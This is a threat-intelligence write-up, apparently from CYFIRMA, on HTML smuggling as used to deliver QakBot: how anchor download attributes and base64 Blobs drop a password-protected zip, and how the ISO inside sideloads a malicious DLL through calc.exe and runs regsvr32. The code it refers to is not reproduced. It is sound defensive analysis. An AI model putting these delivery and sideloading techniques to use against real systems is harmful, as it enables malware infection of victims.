HTML smuggling is a stealth technique adopted to deliver malicious payloads. Over decades threat actors have used Macros in Microsoft documents as their primary infection/attack vector. With Microsoft blocking VBA macros by default in Office applications, threat actors had to find alternative techniques to lure victims and deliver malicious payloads. For example, malware like Emotet, Icedid, and QakBot have already started using LNK files, ISO files, or IMG files and techniques like HTML smuggling to deliver malware. Even though such attacks and techniques are still evolving, researchers have observed a many-fold increase in their adoption since January 2022. Particularly nation-backed groups like NOBELIUM/APT29 along with prominent malware like Emotet, and QakBot are extensively utilizing the HTML smuggling technique to target individuals as well as organizations.
Generally, threat actors use HTML smuggling in one of the two ways:
CYFIRMA has observed that the HTML smuggling technique has been used by threat actors like NOBELIUM to deliver malware like Mekotio, AsyncRAT, Trickbot, and recently QakBot. This malware is essentially used to gain control of victim machines, effectively deliver payloads, and execute ransomware attacks.
Anchor Tag <a>: The anchor tag <a> is a tag in HTML which defines a hyperlink and is used to link from one page to another resource like the script, other HTML pages, or downloadable files.
The most important attribute of the <a> element is the href attribute, which indicates the link’s destination.
When <a> is used with the “download” attribute, it can be used to provide links to a downloadable file.
As shown above, when the user clicks a link “Click_Here” in our case, the “download” attributes automatically download the file referenced in “href” tag. The above code instructs the browser to download “malicious_document.docx” from the specified location and save it onto the victim’s machine as “trusted_document.docx”.
If the Blob is large in size, the Slice() function is used to divide a large payload and provide it as an input.
This will result in triggering the anchor’s click event, which in turn points to our blob to be downloaded as “maliciousfilename.doc”. These features are supported by all modern browsers. For older versions of Internet Explorer, msSave Blob method may be used to save a Blob object to disk.
CYFIRMA research team is continuously monitoring new tactics, techniques used by threat actors along with ongoing campaigns and methodology followed by cyber-criminals to compromise organizations and individuals. Recently, in July 2022, our research team monitored an operation consisting of a series of emails related to the QakBot malware campaign.
Below are the snapshots of the code available in the attached HTML file of spam email:
As shown below, the HTML file code has Base64 encoded malicious file code stored in the variable “text” which gets downloaded with the name “Report Jul 14 47787.zip”. There is also a series of functions defined at the end of the snapshot which is further obfuscated to implement the HTML smuggling technique and finally download the malicious zip archive with the name “Report Jul 14 47787.zip”.
The zip file is password protected – the password is stored in the HTML file.
As shown below, when the victim opens the file, the zip file automatically downloads to the user’s system through the HTML smuggling technique as depicted above. The password is also displayed to the user to extract the zip file. The zip file contains an ISO file with the same name as the zip file but with extension iso |(i.e., Report Jul 14 47787.iso).
Upon extraction of this .iso file we get four files: a .Ink file, a legitimate calc .exe, WindowsCodecs.dll, 7533.dll.
This shortcut (.Ink) file points to calc.exe as shown below
Upon clicking the shortcut file, the calc.exe gets executed and automatically loads the malicious WindowsCodecs DLL file. Here the malware authors are observed using another technique known as DLL sideloading to execute the malicious code. In this technique, malware author place legitimate applications (calc.exe) and malicious .dll (WindowsCodecs.dll) files together in the same folder. The malicious DLL name should be the same as the DLL or support file required by the legitimate application during execution so that the threat actor can leverage this technique and load the malicious DLL file. In this case, as specified calc.exe is a Microsoft legitimate application and WindowsCodecs.dll is the malicious DLL which disguised as a valid DLL, and loads by the calc.exe application, which further executes the final QakBot payload 7533.dll using windows living off the land binary regsvr32.exe as shown below.
|Initial Access (TA0001)
|T1204 User Execution
T1204.002 Malicious File
T1059.007 Java Script
T1027.006 Obfuscated Files or Information: HTML smuggling